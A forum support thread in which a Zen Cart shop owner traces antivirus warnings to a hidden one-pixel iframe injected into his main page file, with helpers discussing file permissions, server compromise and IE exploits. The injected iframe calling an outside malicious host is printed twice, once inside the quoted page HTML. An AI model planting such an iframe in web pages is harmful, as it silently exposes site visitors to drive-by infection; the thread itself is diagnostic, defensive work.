A VIRAL Problem!

[Big GEE]

Hello Everyone,

I've discovered a horrible problem with my unfinished "shop"
**link to site removed**

When viewed by IE on Win XP I get a viral warning from my AV software **link removed**

When viewed by Opera I get a message that tells me that http.....xbtuavnxbb.biz/dl/adv493.php can not be accessed. This is not a file on my site, I presume it's a "hijack" URL from a viral source.

In Firefox everything works fine! No warnings, no AV software intervention.

I've removed the virus (Hacktool.IE.Exploit) in the usual manner - switch off "restore" in XP, scan, delete file, reboot etc. etc. The AV software is not activated when I browse other sites using IE BUT as soon as I open my ZC Store page I immediately get the alert again.

Has anyone else encountered a similar problem? What's more, is this virus resident in the ZC files on my server?

Any ideas?

Many Thanks,

G

[DrByte]

That's a nasty one.....

Not sure where it's being triggered from, but here's a few ideas to check:
- iframe link:

Code:

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

- all your template images ... to be sure nothing's embedded
- your no-right-click javascript
- and your flash content .... and maybe also the OBJECT/EMBED code you're using to load/init the flash content.


(We deactivated the links in your post because they even caused the JS to start infecting our test machines....)

[DrByte]

I think it's the iframe code, based on this Googled result:

http://forums.startlogic.com/viewtopic.php?t=547

[DrByte]

yup -- and the iframe appears to be coming from your define-page-main code (see the last line here):

HTML Code:

<font color="#000080">
<img vspace="0" hspace="0" border="0" align="bottom" src="http://sccambria-online-linux-store.com/pics/thankyou_greeting.jpg" width="185" height="79"/></font></strong></font><p><strong>
<font size="3" color="#cc0000">
<span style="color: #000080;"><font face="Arial">If you're a </font>
</span> </font> <font style="font-family: Arial; " size="4">
L<font color="#FF0000">I</font>NUX</font><font size="4" color="#000080" style="font-family: Arial; font-weight: bold"> </font>
<font size="3" style="color: #000080;" face="Arial" color="#cc0000">enthusiast you'll find EVERYTHING you need right here - and at the most competitive prices available anywhere on the Internet. Many items (like programmes and utilities etc.) are <span style="font-style: italic;">ABSOLUTELY FREE!</span></font></strong></p>
<p><strong>
<font face="Arial" color="#ff3366"><font color="#000080">I</font><span style="color: #000080;">f you use one of the proprietary Operating System (like Microsoft) then there's still lots of HARDWARE, SOFTWARE and DOWNLOADS for you to choose from also. If you're thinking of migrating to  </span>
</font> <font style="font-family: Arial; " size="4">
L<font color="#FF0000">I</font>NUX</font><font face="Arial" color="#ff3366"><span style="color: #000080;"> then this is 
<i>DEFINITELY THE PLACE FOR YOU!</i></span><i><font color="#000080">
</font>
</i>
</font></strong></p>
<p><strong>
<font color="#000080" face="Arial">Whether you're looking for a LINSPIRE LINUX 
Distro or a &quot;READY TO GO&quot; pre-built and tested S.C.Cambria Desktop or Laptop 
Computer System - we have it all for you.</font></strong></p>
<p><strong>
<font color="#000080" face="Arial">All the hardware listed in our shop - which 
is available for immediate online purchase - has been fully tested and is 
compatible with the latest LINSPIRE 5.0 Desktop and Laptop Operating System. 
From a humble Mouse to a Wireless Server you'll find it ALL in our shop!Don't 
forget to check out our
</font>
</strong></p>
<p><font face="Arial"><a title="Goto our HOSTING PLANS info. page" href="http://www.sccambria.com/hosting_plans_comparison.htm" target="_blank"><strong>
<font color="#FF0000">WEB HOSTING PLANS</font></strong></a><font color="#000080">
</font>  <a href="http://www.sccambria.com/hosting_plans_comparison.htm">
<font color="#000080">
<a target="_blank" href="http://www.sccambria.com/hosting_plans_comparison.htm">
<img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a><font color="#000080">&nbsp;&nbsp;&nbsp;&nbsp;
<font size="4">&nbsp;</font></font><a title="See our WEB DESIGN SERVICE page" href="http://www.sccambria.com/webdesign.htm" target="_blank"><strong><font color="#FF0000">WEB-SITE DESIGN SERVICES</font></strong></a><font color="#000080">
</font></font> <a href="http://www.sccambria.com/webdesign.htm">
<font color="#000080">
<a target="_blank" href="http://www.sccambria.com/webdesign.htm">
<img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a></p><iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

[Big GEE]

You're a star DrByte!

Now you're going to have to pass this by me VERY slowly.

So (according to the last line in the copy of the code you showed in your last post) the offending code is contained in that line of my define-page-main code file. I.e. <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

If this is so then
a) Will deleting that section of spurious code rectify my problem?

b) Where did that information come from in the first place? Could it be the template I used? And

c) Why is the problem apparent in IE & Opera but not Firefox?

Thanks,

G

[xt0rt]

I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

Just seems a bit off...

[Big GEE]

IF I've read that thread on http://forums.startlogic.com/viewtopic.php?t=547 correctly then the problem could be with the server itself. I'm getting very jittery about this! I've got other sites on the same server.

If the spurious insert can get planted in one line of code what's stopping it happening to multiples of files? In which case it would be absolutely disasterous.

HELP!!!

G

[Big GEE]

I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

Just seems a bit off...

No idea xOrt,

My original zipped download came from the official ZC website. The only addition was the template I'm using plus a bug fixed file that was causing problems, but that was a seperate issue. That amended file came from the Dev Team. So no outside sources have been used for the actual ZC files. If there is a compromised copy floating around then I certainly didn't download it.

G

[DrByte]

I'm guessing that maybe some rogue script on the server may be doing it ... esp since the define_page_xxx files are in a folder that's CHMOD 777 .... making them writable by "world". While this is necessary if you wish to edit those file from your Admin interface, it also leaves the files somewhat at risk, depending on the server's configuration.

This sort of thing is why hosts enable the "open_basedir restriction" settings in PHP... to prevent people from outside your account having any access to files inside your account, regardless of the permissions set. But that only works if the infiltrator is making their attempts via PHP.

If the "attack" is entering via something at the filesystem level, you are likely still at risk.

AT THE VERY LEAST, YOU SHOULD NOTIFY YOUR HOST ABOUT THIS... so they can take measures to stop it.... and maybe identify where it came from.

Your server's errorlog may or may not help you see where rogue access attempts came from.

[Vger]

Why is the problem apparent in IE & Opera but not Firefox?

I'm guessing that because it's called Hacktool.IE.Exploit that it seeks out vulnerabilities in IE (and Opera can be configured to work as if it was IE).
It's probably related to running Active Content in IE.

The worse problem is that if it is using Active Content and someone who doesn't have a Firewall comes to your site then their computer could get infected with this trojan.

Vger